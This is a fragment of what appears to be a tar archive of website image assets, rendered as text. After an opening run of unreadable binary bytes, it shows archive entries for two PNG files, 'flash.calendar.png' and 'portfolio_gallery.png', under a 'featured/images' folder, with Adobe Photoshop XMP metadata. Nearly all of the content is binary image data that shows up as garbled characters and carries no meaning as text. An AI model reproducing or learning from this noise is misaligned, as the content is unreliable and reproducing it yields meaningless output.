�f�{�hs��-Ė�J�'�I%����a�2�l�R�2>7O�_���oZM�Ķ�^�.���˫����b��>z��1�b��ET���I"W�i�⹼7�H�_�!��Ú2��A�F�\X��4q+Bb(�$s`�p�l%���gõҬ�1���#L���Ӵ���a�����;��Z�g��Z�V�40�iM)�-į��I����(�.�ޒ��T�P9��Ҁ0⑈���(u�:_�_��ϋ5�i�)���^������D֑�ٺGt� �63�]��=��W�֙g5��p�Cqz��M"�$j��*9
9!N:U�Ub�L�8�<��d��~���i�+�e���jv�g�,��,��6�S�h��L:��+s�⯾����3P��썶�̹U����y�q��Z�M�4��h�3�[Ez�6��-��OG���9��X'�捲��$g!�g�<W��iZN���Z�U�5��P��m�m��bH%�pʮ���$��@��۵΄�1ET�QE���������(��(��(��(��)C�=ҁ=���
���k��T���E���������]��X{.����q*H�T�or�f`���G�_�*'���X]�[������V�3~�#�mo5��j�D�h'|���?�Y��(���H�<3�����ƿ�
�kcx-�kJ�SV��ak���?�/��>W�~p���G����W���K]>r��
�7�@��?�U�U���]um+K�dԤ��m^I�"�7�ss�2c�3����/��?�?<Qm�i:1i~�ޛ����}6#��y옒���) �`���eGhi�R!�'�}/nT�a_�4z��$oS���_�I�50�A��)��I�~�?�>���x���S���׏��_������Fе��^�Q[]+OѬe��K���]���`n8QԐ+��4i��?�'ď�,����o��i�>u��ҿ��(���c毣��i�d�pe��ʜ��_���܅;T�K?�����7����Ph��&�e��w����"E��.mF�eG���  5���b����1�n�/|(���xk�~d^<�I�G�]"6o�z��5�Q�ğ���z�_�_x6�9B�`�a��}�������㟋q�fռ��Dž[J>2�W�5/�5�fb�l.!�͐opX�'o�Q�V9*��s'f��f���ͭ�����t��)��J)/�Ȧ�*�j�(T�_!%�s 92��4������*��<>��u]OW�|I�\j�VZtV���sa#��,Y�$�&�8<
�K�_
Yxs�߃4�	�qN�#ґ�W���YI/,�~f�B�Ē���7�Pžh��MsPU�	8�"ۑ��:/��Ί(�	
(��
(��
(��
(��
(��
(��
N��KL~�C@ �s��,�/[�H���2�g�������ŚI�]M0K�os��)�RX��V��+�4��
�H���i���"��;��i�E���D�>�c�&����R�f��� ���B�E�p���Ǿ>��w�
�)�WU���++��T�5�:���+�FU��(e!G��r�~>|c�o�|g�}+ǚ������z�o{�ٲM{��u��EX�w�j�pv�߁]Ts\]:\�z^�?�~�=\�,�by���w�ɞ�a�x/M��Z�������h�~1��Y���c�i:m��;9`�6�Ӡ
����vޱ���77�#�/��x�ö�,����)5e�k�?�y;�"��|<��q�j�
��Y|¿�_��|�^�s��_��z}է��t{!q��/5�Q@��7��d����9�7�7��)x�x�F�����'Q�:U�I�5��lD{��y3���*6�Y�3�E���t�g<�)��2�����s��WO��1�?���|a��a��F�k�'OЭ#k{��CH�p�E�2��l��}���/�R^'��ĺV���|>�=���������M����wR�͸��������Ga���_�?��|�o���K�h?5�)���_.M6)��j�[�%�t\36I.[K���ǥ�����<o}�x3�:_��ì���u2ɠZ],F�c
�9������!��0�k��PP����
9f[W��2�w�[���c�O��+�����f���&��+��>3]�WN�/�zΠ�>1�b�W�����H�MmJ���ǵZ�8�\|�����-�k��3�M<g�.�<�!4_0�+Gc�h�;u����Y�$���y�����C����#���|��d�E�?��ɿ��Ԣ�:���|��d�E]��$��� ��B���������TQEQEQE��featured/images/flash.calendar.png000060400000023137152434416630013175 0ustar00�PNG


IHDR��u�;<tEXtSoftwareAdobe ImageReadyq�e<niTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:ba1a0bbd-1eda-3147-94f2-b3ae00a38842" xmpMM:DocumentID="xmp.did:8AE450A0DFAC11E5996FE41A115A4B7B" xmpMM:InstanceID="xmp.iid:8AE4509FDFAC11E5996FE41A115A4B7B" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:02CC8E5FDEEF11E5B542ED907CC6C15A" stRef:documentID="xmp.did:02CC8E60DEEF11E5B542ED907CC6C15A"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>g�^�"�IDATx��]	�Wy�{�YiW�uY�l��!l> �JN �$I���(��*��N�vQ\'���q�;�(6�X>dْ-[��Zi���}���-�������~�lw�>���z�{��A��+r	���Wz��(z��^遢Wz��)���[@�Ag�6�6�ր-�6H���:�RA��:�zn�luEQ�]zۭ�u]?qsM�N�VUUl��1{��Z��Նٰa�i�!Е��@��.�����Z��N��<z��&N�FTN���%�?�t�"�D��@܇��YR,WPl��nK-,��6}̿L����Ew�w�>���}�?0������聢3%m�c�M�Q�q��/��;����A��]R�n���ۗ+ l�$
m�F�����C�p����)�x��^�����A�Hd0�}>�H�8�f)�`�=�kA���tƩ8ap��R�?������0=P̷��-�R:
�%5R�R����&c*�4(^z�Q:����A�|�؍}o�+( �A��E�i��AP'����Z�h�b���@w[�^�
�0�-ew�R��
tv�w�^�ׯ�<�hd��2�z�agH��;̓�r����<��ǟ���_�X(���z�j�S7X"�c}p`��H�@��`�w���B��O�>�cw�(L���d�>��{/(>my�҂�����
�yv�r�'z�h�J,P�f���n_���kЭ=�v�ƈ���zk�Z�šo,'P��uZ9���``
��Z�v����@?�S?)xQO+���D�:����G�A���@���X�����K�*8'qk�}�`��-P-�F+K�i\�c����F$`�
�n�Ai!@q1�{,[5’����")b���=v-*0b�]0<�@�)2���"y#��؎�������̧xh�%-�.�)��@�%	�r���T�T(���Tj^�R�$~'I4�ܺ�:�u��PWn����f�st,�G�P�r�L�d���9u+�&�:�l?�y������xnc&��sm�'S2�����9�}�<U�U�K��3)��u��L5\k��m۶�I�/�
��ivv�����Z)ϋr1s�X~f�4�>�~.7��T)�Nc^ݙ���q�V��T���$y�HN��T,���ժ�E�s�j���4���!��խ�)�cǩV.	���+��8��ac���w�E��x�KKZ��j;��P��[����T*�git��x�z��+��UAS�45~�"`x4̯�Q�+�'?v��j��(���ɺ8�`�8>�\DǨZ.�86	�M��ɘ��2���|�	ܳ���t*	�*�[2��d�?Fq��{{
R��{��7N�$���)��MO@$(�#���n@=z��������M��w5:Ɵ.��9�ki\���^-�^�E��z�����)��!=(�P)C��dѐ�J!�}J�bF�f''��@Dgs��q�q�܃�y���HMe�?3+@�u�W}v�r�E���к��Bc���q��
z~��� �u\=�V�4��Q(��u�pL�	E�B��,_�ҋS:�&M7p�0���I�)��o�N	H��D/��=�T�#�ʎW�`%TP�.޺���_HZ�`IȪ���~2�Uh������9ɷ�r�O��ѩYڱ�N��Qzx�J��(z�bt����ի�r���S�fPL��f�]<P�-Q�9&heLcDP��`]5T�����T�R
���pL�˲E0,FO���Ku���
j�������TU��T��XC�V��uu�v�h �'r*M�F(1R��8>���a����5�̜�F��ta�B��c���I�׼/��H�.Δ��G�Jy
����WP)A@!K����罠o-(��M��}�4���j�@
���?��{~��>����6&@�l9c5
��`�F��d��NL��1����m�ɗ�����0F����B�R�6o���A:���N�H�$`b����7��>����㓢k���>��P2B��8�4�%N*�zv
�yˆ]�i=8\ŻLQ�%�	�"�*�h(3D�Grž���E��R�t��0U���{��DN�F,	�C�2ʴ��K�(���x~������608�0n���n����oik�	!V�d5z��A[/YM%Jб�Iѻ��q�p}��\gЅ���5:v�&t�����]��M����$EI�e��$]�J�+6�<5E�%�^>����p�@�޹=C�5k(��3�{T�$z�%g���oI� 9֏��a�Ԅ
���ؐQ�Ή�ʭ�q_�~iV�-��5qz۶��1(;;@�e������2�sׇ�]�gizh#�뜑ţqz͖z;�� ڡ8=p�Jq5FY�o�.*K������ќ�nk�����D;�J�A��Q>�O��MCУu^D`�TuŸTL��C�:�0Z��
z��
t��bj-��g�_�Ӌ�I*E2�kT��L�I��o��`�sNJ4ZF�f�wSS#T8�
�:Z���B��+�Lj��	�
�A�D��Ӭ�����E���@��~:T�ӡ|��x��RUUhZOP}pղQ:p$�g	5�6IDS9��r�}�*��4��PgSx%�4�΁�����q�)VhԤ��M��mPX*�m��wW[!�����g&"������,���'��w�L��'!A�'���b}T�'RG;��%�<�O�+��3�^
�4kзB$�Sth�J�P��h�	H4��ǒ4�T���u�)R(�'t;~��t���ԗ�������P_z����=��
�3R ��U�i��N��Y���0=;\�����8D�5����e��L���$���
���A��Z\8�{�g I# V���װA��!-�_o=`M��]�֨�7N�%�
�q�%��aݓx	F�B'��%e�b��I��
�U�`�ꔂ���I)6�В��@U؞Q0$�ks�����s]E�	�X�!|=�J3��8�&حQN?�2��.���4+���2.Q7��xf����uU��!�Z4b��f����D �]1����(����t훯l�}��l�e5�/]4xՌ�X	zG���_�NB,Vk���#�2[��G��V�b4���:��NB�3p*�`����!��ƅ5�T(πA��b�!�
`��L�[���_���W�A$l#¬�ul��
Af_#)ō��
n�J]g��a���|]>�ZTb 	���U���0�+�h9�m��Z��cJ�H�D���_tb�kM&�`6�"�"M�fC�1��i�9�n

!z�H����U���[����tΪ0}dK���Ph���ߚa2M$�����	6n�S�By�Ռ��aFC��`ਗ਼	f~U��B.,K:Vs�]��!oB"����OL�c�g���Si�$n�}mb��q+���N��z�@�؀X�G��*� ��_����A�����HI�;_��Ϣ��>b*È�C\�r͔2�@}1S2�XY&���	@�]�+��I�#�'�
c�YuNs�D׎����2�a)V��C�	 :"�B*X?�}��M�k�R�-��Ӯ��M��Ӡ����(���4�1�$gC9�����xdD�o�SL��%1�|�B�Q��
:�Q�pN��T�����pA���Ӫ\6��lE��}��9G�l��
Kpw��(z?�����yMDO�[
w����4#x}&,��S�Pc�2!Z�g�ӌ泗
:)�ZQ���U$���4U�{������^)pg�J�ȨN�q�M���&i�{�k���
-r��<x�D?�S���&��GG���3~��Ϗk"�=@�\�~��H/M�h�zz�&l�=S=u�JUH��F+�ͧs����D���=9Z�Ǐ�����@/B>�
�
Q�ڄA%ŒJ��wL��L�酱
?��8�p�ΦiuB��c5��mOӚ��4Q����xQ�c͊��Z�0�����$��y���c8k *�;��ᮆ��"�)Ci4�7�Y
@Y��A�zX�1�m�.(l�FEyگtl�a)��U4���xXX�O�1/���<��K7�љ٨�VJ��%���*�n�F/NB�@b�#P,���'�7�7�ja �"{.����Y��=^�J	�WR����N�N@:�k��4Q֠Z��@ך�v8mq��ERp���g�]P��Ʃ��2�
��/�ȑ2�h�,����]�=#z>��!f�`\�t��B���ѽ]�.Ai�+�A�0�:���{!��y?�k`3��F�7æg���XM�<��g��k6Fi,_Rhm:[R�� �޾**�|����B��]�����vAq�R�l��E ��}���~���x]sN��18q�j)p�ژ��A�+�
�[�E�-�J.D�(<
x"��h��H���/����KE�# V86Z-���e��9��7	��?�z!!-B�J��8����d`8�j�Xr���1Om	� :\R�^����9/K�ۑ�Lؠ��XR��⇋��{r�x
�21n]ƶdôe ,<��P8z�C���;a��g5<�f¦8u8���)"6�6D��h#�
�@��"!�.D�rM^U�fEܚy_s"1���,%��PX*����E7,-�Q�;�Q�?<;Co=7Koܔ����ܽ�>)�P�Jt�d���nE
�]ؕe}�T����L�u�#��x�jW&qآb�+tr��!�v?9"Fv���RZ��]��n�����N2���"��r{�g��}h���uU�b^��C޶GB�$���\��)��5��"�1)^�X�{�+r���?�2��1EDI[k#N�M�$2�kWXe��שVAqa�{}:���0ys���>�VkkPɘ���(�>���sc�l��v��Y�8�3N���0��s�9�����v��R��8�l����l�n��c�F43�[({0!���*
�źvIQ��}�F��m�N���lm�;kc����ΐD��N��1;�yv~#F;
�F����~�����۱)�\����Q��]�Л�0�N��/����v=�Z��-P�[� ������f�;�H��B�|
�d�. �����`��.(�Fv���7�� n`�;��Ͷ2)'HGh.�lC�ޠ/4���p����NpS2s��
0{+��~Y]9�S'��-P,ژ���n�@f��C�n6�׵���e�8��c��ι�n6J���<�v@]H 4��~�8��o��=�Ӧ�i�i����q�X;�H/������I���y�h��=��$�P�9��܍$ZJ_;�X4+Y֭n��܀r����8\��4QO���i'TB#��䶖��t�2��H�V��f%S#PCZ8U��7�&5܌B�yf�9	���wP��n��H����q";[6"�M��\P��Muڽ�J�PԻ�tg����^
�H9-�9��@Q��TSu1�D׍@��b99�D����o�:O���Wa{"nj���N5�
`��j;�`D��V��)n����n�����3�cp��J���c�e�&��<E�A�c(���>:�J������I?��ՇS��1�R�$�<��΀�,�\��mI
�Q���B�S�
��%�㾠�&
%�6����=qp�2�(��K��Θ�O���#SE1��sWӎ����ca���'��{�#K�F�e��
.�2�(&����wL�,��֣�?����E�ͫ2b�P�\�s���BE���R�G��(��(��e`v����>�|m4���B��^���"G��<�T4"Εƺ)���ӌ7�i�@��c�	�t���8�oi�aIq�I1��M�{����V~��J��˥�J�j�f+*�A*u:;c0m���RM�1j��'�ucx3+�y��8^sll�c����š�rA�\Q����t�\=��9\LY_�PǦ"��od"_�љ���
"&���\]�����򪼢����ɶT����h���y��7
��i}6sd�t�t�ʼ�����!���*�
je�qP��n麁�X�O�kE��}Ƞ�Y^*�	ٻ
����~P�o�*z�&��6����Ɂ)�d���`��ug����Y+$�&2��%
D�>{*!sU��n.�\�w~`L?�1������ꌳ8��fA�#)v�
��[���{�b.sC�ֽ3F�
��.^�(
[��+���h/;����v�c�,o7W�K�yIO���d��R�Z��y���t���n�*�"zn�?�X��5�K��[�,X2�[��rCUM50��"5�R�Y��i(6
L�̑-)��v�>���:�Ye�7?p���e���μ���0����i��,,��{���� u2���n
Tǯ;�+A�u�	v������N,{��l6��l��
�fۏ��<@��N��	+V��&ܒ`�$������H�����l���<��}�73qJ���(Y�l�����Š��g�-��-m�n���U�ݸ>n����5�/�-��N�`^ p��63(f?��=�j�6EPPp��n��mX�
A$�C��Ab%~37�9h^��Q'�$�  f@ؠp���Ax?}�:��U�P��M��<��3��6������se��@t������/香_'(\�!�qo �+ �t��t�~"�-6��{����)~��'�TE��
m&�����:�+�5#)��M�2��h�L3�J��X?��H���F.�������p�dۦ�?�a���;k�o�݈�RrM[	���x^k5kJ���"�Y�2(\T��{A��I1e��	�f&�6#f�͖n��J�s��겤h�x�,%�OE9O�4�
Pp��]P�A
+/k�u�< ��k]�@N!tswe�Yѕ=�0���2�"�-���z3<j���3��7?��������mfı�gp�+�Z��-�GW���c����R��;��̯;
�r;�;��b```��̹���ʭ<c3��K�e���Gm�����B��P|/�j�;b�v�"�_��=-���:X�9s܊�y�V�]��@�ԙ]�����ݰa�[�bECP0 |��AН�G�q�q�[�0qhhH0�9��ƩS˽�
N�s"��Ҳ
 �}gF�<�E�_��K�F�K#۞���a�(7n�y!4��~j�	)q3�0�K	���&���x�mt�gv�<2ɿ�N�3��OE�4`04;����d��o�ƫ�@���c�-.��aU<�?�=�+(��29U�3��9Z)wB�^Bm9�N?)a{��p)���^�(���3��� �g�{%�:Ab3VNCtY)w��`IaKi�+�O���c���x>փ�\p4�:�FO���&��p;�
b��@�g��<@c'����і9��A �ø�hO[���P�y����4^f{���)�|���Q6.y�aK0xA����34ەL5<�{����YJ����Q-;
�g��>݉�{e. l�R��t�4�N�����
^n�k��m����!�P�t[�����Jx�����a�ۆ�3�<B٬6�
.3x�w��=`�[B��#�d~3v���Ѝ���K\�S{6F�F�-!|��J�m����5Bm�����F��Ӱ
K@�@?�Ƴ�2t�|/��5n�@��L��
L�^����r#�o��)��m���x<~3C^=�W�N�#�L>F%���]��\��[ Kƭ�hT�C�=u���`��Lk�����b�BH��e#|:�Y]8�|�L~�x�vGI�)_+�J#�w�b���NNp��� K�Y]\x������O�(��`�>�{�����N��2 |��\x��;)���\v��1�0���em[�T���gK�dc����&&�,gPp���h�}
��I��8�`��`Ҏm?|�j1�����r��87�~���o��ͶԐ��e9D�v�A����]x���H̢�E�2�%�~��h�A�-�b[�I�JZ��s%;y^�
y0���U������J
�1�А_ .��C�RCNY[l�8W��� ��=��)�}��#�DY2�����ؾ������gȓflO�)=�
�e�l�ے@&9���Q2c�I�>�@17f��=4���>	��B�n�#ȗ�����zV�T�W�sN�i^���P�/�,V�M��6�}=���`����65ʄn�/��
2��a�\`������
{C��A0���*n`���D_?0��ùn����
�����lKQ}xn��L�`NA��s������ *�m�4���(/���
��[�e9I
�/�^��V컌�g¼UF#�����,C�C�?#s��'�:�OI�U���3`��Wa{%���.��|l�m�f�cd�b�4A�H�ЩU�1���ED9$ʋ���
��ZZ	�ڠ�ڲ�*Z�I�S8z�̬i����K͍\0��+�g�@�J��E��@�+=P�JW�0�8�I�a�IEND�B`�featured/images/portfolio_gallery.png000060400000506455152434416630014075 0ustar00�PNG


IHDR=
��%ItEXtSoftwareAdobe ImageReadyq�e<&iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)" xmpMM:InstanceID="xmp.iid:2FE92005A57D11E599B4CD79AD4B8614" xmpMM:DocumentID="xmp.did:2FE92006A57D11E599B4CD79AD4B8614"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:2FE92003A57D11E599B4CD79AD4B8614" stRef:documentID="xmp.did:2FE92004A57D11E599B4CD79AD4B8614"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>�=����IDATxڜWixT��~�>3g��2L2C�%�4ЊQ
|TB��*"�T(�E�Ei�����"���l�D �K�Of���vΙ3g����b�_�\�s������}��G'No
�L�@Hn��]|(&U�I��ׇ��[��a����ǁ;{jPz��ꋎg�����U�O~6-;?'���M�RFz�=�\�֗V���+�y2�1��r�h��xI|Q��!
��ɴ k�N�����p���`0QtM�8-(0�����;u��B67�'������u����1��2��4�i�L�'�g�y��>�b��iy.�c�N����BF�\�ٺ�/�AV�#�����K�h���FJ\��97�*J�S),�k�u툏K�
gt��}������Np�]8?{��#GƦ�����L�
�����?dY���W�q�\�w ������k�,[�hhފ5!���d
�q�"����$���G���ClG�0�����G��M��}�B�KlN�������L��g}�D�⭐�$طi�7}jN����@���|����w�����s�BE� !i�#hL���YFP�8���%��1au�GGg�v�N�o{�žݽ�����u]S�� ��#Q!�Tw�T�̕/BOo�����_f;b���'�|�[�~��
�h��b�a)=:6��e�
�#l�C=a���~zn��X�+�~N�q)r�)P�_�0����W�g���z�������E���Zgs��o��qe/{�|�7h�=�ۭI2@૵�'��1hB��j�$��Q��3�ږT���-�3�F�����1l����B�KK�N6�{��/��Li<�G+M�[���Uɜ8��Z���_n5�˞<��Oq!�P��n�>#=y �6vy�
x�T�Q7�i����1�h�35Uy��A��!)ʎ�.^Rdv_�ȣ\Z��9C�/�V���su��廙*�A
�T'�{s�	����?cB�`4�۴�v3{���opP5{��w�!�б#0�$�N�FB�A��bv�SU�!�yvů�5�ַ��k=>1�@BX��d����^���ŀ����)���b��@g_��:�����$�����\P�&&J�@ ��⼊K�J4��"��PFdQ�``&uIf[��d�̦D
DI�ώ$�TJ�k��@U`�i0P����m���H8�L�@��s~�~��S&�$0�s;Ɂo"��߲?�<�hf	��b	|D�pX��HIi���4�"����kij��Oj�����{3��3ҝ��~�W3f
���ቔ�%(I~����[�k[�K�#��7���?�[�is�ŋs�6ぇiux�g��b�b�bY_Y�����"�#��1��yIT��I��{GeEqZl�s�Q&H��w}�eѺ�pdu�!C��}�����9Yͻ���3�\���\0a2��8��n{��WӴ7w,�$�%�)q�gq���;S�9g�s�-2�7s~:��V�}��'�3��g,�T�-HU�]��@K�ia�;�@4�;��_��ϒ��}?<o��y�O���)׾�F\�TO/3�O��#ḡX2�ٶ[�!VT3�0�����,pЀ�A����Ek7��u��R�!��7a�̞�W��Ѣp�t�ޙ:�s'N�,��s�Β�L]rRM㕲�yI/o�?��䎪z�#���P8�9UC&��ݼ�q��v��⢗nF�]��?,���h����7�� A�O��&����ϵsX}���=ud|�˝����r�.]�����Bn�*7��(�s���6�B��QhV^�,r0�0Ȓf1����P	����!��f.�����û��������Ź̙?eW^���o���08<���]0.�3"-6w�֋�?�A,Ԅ1��^j)����蹩���"����?,Xi$*�q (�wE#�-o��'�8yd�w�N�Խ���GC�ݸ���km����"�8��3�\�ml��c/.����H=��	�|��|����*p1Z &�8VR5J��j��	�o�����O}06�om�����?�/����@s��D�7���������M,���"��@�m��T0��.é���ـ&R��wx�����7���
Lr��֤W*�U�-zµ�Y��r*�O;䥻Lzõs�h����3.D��o;r3r��C- ���)q!B��9QR_ذr�#��|p�zM�1�� ���.v�s/]�K�HG�)4<�V���gR���i-]y��>Cf6N���w�'Y3r������T����M��L~O8� �Q(_�YS���k]�	���U���DB�F��������>�����8�I�}F&��72��Y���^z�6o{yK�<�����s,�y�=�T*��EO�3y��>+-*%�^E`,==���735=D���6Q�ãU��v>W:q���I��;�+�n9�8�=�eXQq�D�
��.��1���;ګ.p����L��h�\��P��:�:C�����vljYY6�:.�ҳ�j�n�����n�#Cո�eI�7��=�GEN�1��������j}����}����z��=a?����]^��._��<�B&*���gp�ڷ��g�/}�FYR<�ǥo����a�;�	F�
�mxv��:�g��d��4Q�g͘+E����>�׃�u�3�<�s�ƒ4�1 ʠ�x:N��ba�]�+���j{�?G�1Y�GL�-�{���(?\��b�a�(��`*=GD��@=�8Pa�B *�>�p�	�5�(c�[6�J݅�_~E��zT<��W�H��j�#��8�r�G�m����o���!/RXb�� ��LЫ`Ƽ�~V�ӋK	B��md�!LO�\2�L�gTC>>z������H1"ţ��p	��H`aa��l������݃�I'���+}�NO�N/hni��C
V$V��W$QUW#026�Ұ��FD�(N$\�qDG�QI��'.�tĹ���`05S�5(+��c�a����!9�*
�P%�AШ�8��g�)I'��6�P�̌�fj�%��2=+��._��`K딬|��k��'4�a�H\o�z���3�����k���L�_ݻ�/�K���=�\�B@aW�񂠀:e�etW�Y=�A�Ȉ�
8�8gt�2AH	`nM�$�Nҷ��U[af�����~T�������</�f�Q�@Km��n��e
U�OʹGR�ooS1J���em�f)2Y�+a_٣ h���;����q�����=c7.l���e�`�B�7\C���DB�u��Cqf+�ERF�ȉ���}��׭�~�&KX@*��9I�&-�iI�����_�T�d��φ2j�o�]��<���+.�M�ŵ��:�RPS���I��r�|��c\�#K�K��$M�S�Lۅ�Ξ������0R��u�[�ty�vhx(��.W��Ef€+gz�5��΁��_�h�
�ޫ���K�@E�9����|ƬH穲��� Y�1���7�9��U�_��?��J�E���X	�a}CkO�m��[}��tW�{ηߤ|C*�6w���C�����Ps*K3à�ӛ���ZW9�w���yEZ
b�;�ޱ��T<�с�p{��N�ڶ�w�άYUQdN��6+h�}���O�f��2�!��
�N�c�(J ���u_�+'�2���yr�T��q���\M�Ŗ��`I���u˟��C������m�	&C��8��:�t��Ñ�=D��y�L+��.;���a�dž���L #i.ʀ4���������L�	z�_��?vq1���hb��D�a�b{�P[s���)�u�H�>?����i��[~�tGNR�<#�=9
("!y��?P널�'C�k��No5�x�𥕅5-���ѵ/^�]�Zi�l�Έt��@��pٳ�N�v�W�>���Ǐ��-�r�
�"�ix�Os}��ո�~71���4Cs��{�#I"�jBQ����jE^v����3��ÔTaƾhٻj#�v|PJ�03���b�I�����//0j-N<�@��|���D&�rʃ�������<���TY�~<�BGO� 0L��(1�H�i5(�/qX�:�?�RI{���vW�K��J<ʥ� YZd8A����
�_��i�%���QiJ�����nM$qĢ�e-�^[�ޤ�0-r�4X'D���U�E�bq/:����O�T�l�0h}���3,fC"��dI-@i6�.*D&��1
K��A�Y�(���l��l6k�eE�pl��Y2P�6���E�ɀ���s���S�M��b�SqZE�k
�{��nӒZ�34���7����5���*{�CQ�dl̨CI�4o�kD&m�q����:��Ȟ������o����Do;S��
��_]J����ø�|Ϟ���n�f���:s����ũm/<
FK�$
���yY�Y���"�����_X�x��v�������b�4�(A����בH�Û1\C��R�Zh��g��y������O�W�}�+�ɺ��pEn�=n5��
���E86�(�ڟ�UX���D�"K�_t7_|��߭��k���<��5ThF;w��j��h$�A1�H��\ǖjˈ��Dр�Z��1��fV�H�V�(d�UQ�K�|��������`��@��X�&�G�!�e[ּ�:���9sK��+x�c{q���cG�,����|�㾟��D��%F6��wT>z?5��ȱ��)����[�R4�X��ێ��g�r��Q�
_h��H������햞η�r)��"���f���E�gt�<�[�_d؉E���8#��l4W�z�$Ј�)���te(a&_�S�g0��46L����yB��u&��%��ŵ��
"�:��� L��*8"�`���q8T%s�j��NLv	d��C�أ�	&�qɣ�(m��	ު�{F)�X1�8���&�����عzO)����M���^`�z���l޲c%zo������ݴϏU�gK�uʭ�1�L��ѿ6���ƶ������և �
��������v�����v����w6��~�%��{y��u�O?z������:\o�
�H�֙����  �9�k� M��p� Ѭl�@�h�B`2��L���[w�/��Z���T�C�_=��O^.ơ�36�;���J�H�f��ٹu��@����f'��}i��:XA
�@0�@`�)�?�Z��Y��@�b�gv���,�NJ
љ]�\E`	�+GO4�M�,1�����&��fk
����ۭ�
[�u�˾
;S
|�WsW>��Dj5�>�x��#��"3R���.5��d��|�W��[�/����D:��#�6�ٖm�~k0�n�W�aJ�[������>�	!j�B�l:�K���|����
*&�8x���t�'7�냗���!Oaf4��p�7�M
�~SDžV>��\��m�htJ+^U^4�<��|sߨ=?��f6�ݙVY��?�|�cդ�P�ٲ�@��a�g-�sybǟ�DB�*���**-��&�T!���,��24���3̙+�4$@Y�h��k~6x����r�H�-x7#�`D6���@��5Z]cG��nپ��G��~�GRO
�8��zEH�Bܠ	��w�� 0�:�4�j)�hf������ަ��|�����Y�\������ڧo���C�fVɂd �)6�[34�ƃU�lK�S&fB�\�&�so�����`�g��4���̪_9�dEqMCcs,�!1Y����K�*����NDp�����Вb��˸��"�T�k!
��9c@�U�$&  '/���b�ܷ����:kneAqäΞW�&L)�+%�O�{!Y�����;g������``@!L-�(`����l��eŅ�[/-l�]���+��%�ڈ�*o*��^�|�N�5&
G8U��IY`�xNzl�O�(vG��{�4��d4B!�?$0b�3+�?��}!f�-J⒒4�",ŧ����
��\�T�0/b�4	�-�M�$���L,	�:}U����2eW�Ta~�g�!V�AĀD��F`ej�O$�S��2v	��*/#�� A�ɤViQ�x�|hź�릗6O[X�3��/^��s��>�3P\�QH�5CpX"�Gޭ;:�2��-�g��L2	d�H��IE� *V\)�u�U{�U@WVw튊���
FI����@H$!!�2�L�ez������=����=�o�93��s�>�y�_y�g���{Z���&�恨?!gq	G·�.�����]^��(�'�u��J�P0��Cq��%�W�D���毠%l��5:�i�a}�>a�I�*-i��L��ƫF�[��W��U��޹��^���[>�z���_t��@k�k��\t�m��/�k��dK��	1��?�zރ��8��Kn���\IP�x��I�|~N'�Z����3��&(T���?��G�/�8��#B���Yd$	�o>����� ��w��G�D����쎹�lm�����"�/��YKq{���|
�귿�9�j?��=P �t>}���
8�2n�M=�{3���YXr�$)L�bHN�z���s�6L./�5���
���3�=��Ǻ�{�]?>��tdko�iN��an�Y�'JS�$5�l�[3G�aHi�T<'DŽ`����(T�Z��q�NApH�L�S����QJ�nܺ#�C-��)|<4����<��9���EZ��q9�J��>���3gq�˯�2E�;��?�M�qg��"�]E�,{��2���~���[1"A6�S�)�u�$S����I6�*b��1�X5������	��H����wĨ�KÏ-���[n�P,��ú[0����^I�%��$����]�����U6��KYj�?�PYG*�$��Noh�	$GC ���W	!��J	(��@N��U�dh�p�S��������1)k�I�2�.x����aيwM��К���/F��J���!I�nX�0q�qTvA�����ٶ�ͯ�TV덥gζ�GX���n�x���ƔU|�*
s����Lܞ��Jb0a�I��:Z��誜s��s�`3Y4��E|��Y4�L���	\�Ѫ��d����r���ǃ����,�c��i��2��?���28���*<���d�K��?�x�;O4;��q��{��[����ۊ[!)"XqL���=Uم�3kB�ސk}QA���=�Hm���?=tG�VK.+�U��e�4�~��9|坍�Y
N�ڹu����y����+��^%x�n6�Y̧U�e� $w״(��9�Χ8S&
eZU�
O��ek��iͲ���՜���4�=!�Q�c���9I

��j9�	J�?��˿�f����d�
�wj�����%����ڕ7}T2r�c�&lR����^�4���Z[���k���U��ض��k	0�qE0�]��SaF����t~4����$;���;�S��^�U�_�jrF�3��i��t�L�
;��ۦ�G6쾀UϘ�<%��:�Y'�
\:%�a�h�h0�Ԥ�Ri\����ݤB�B,�?X�:"�L7�l%,���:��Cm��9{�⏝�A�bS�h��Լ�ĊKЉy���e�-�Y�H$p�{��]]��%Ekgd�8������}��:��M��I����YUU8�9y�hlW}G���	V�;�7�X���e����]?^��"��|��/����iq��0Bh���۶0��*����.˜��r�FehT@�EFP�a�@��b�^M��+(0�^�Fذ�����[T���7�3����X�,��	Y����
����Fߺ�
 �!7��BÚ8��8�a�O_`$i�-���m3��b�#JoB�`���xl|y	#�N��D�����!RUQd��L��u׷]���8T��C�ԻuQ�o�~��ӛ���d�`�jG� �`���T���i��K���(a�p"�b,&]�ń���@Q�x
eM`,�GQF���f�����G�0�	Q��UdN99�
